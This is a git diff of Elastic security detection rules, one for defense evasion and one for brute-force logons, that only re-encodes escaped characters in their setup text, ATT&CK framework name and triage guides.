+++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_106.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 21,
 "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_107.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_107.json
index 9dc25d318f4..606888e6aa7 100644
--- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_107.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 21,
 "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_108.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_108.json
index 6cc22c05744..3eb4a3fdfe7 100644
--- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_108.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 21,
 "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_109.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_109.json
index 4f95726f329..a1b27c3bf5b 100644
--- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_109.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 21,
 "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_4.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_4.json
index 2c1d692dc02..345840bdbbc 100644
--- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_4.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Multiple Logon Failure Followed by Logon Success",
- "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. 
Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where host.os.type == \"windows\" and event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625"
@@ -72,7 +72,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_5.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_5.json
index 4f75c496f4a..d8b0e8a9c10 100644
--- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_5.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where host.os.type == \"windows\" and event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625"
@@ -72,7 +72,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_6.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_6.json
index 9c84813c730..66aec9e9193 100644
--- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_6.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
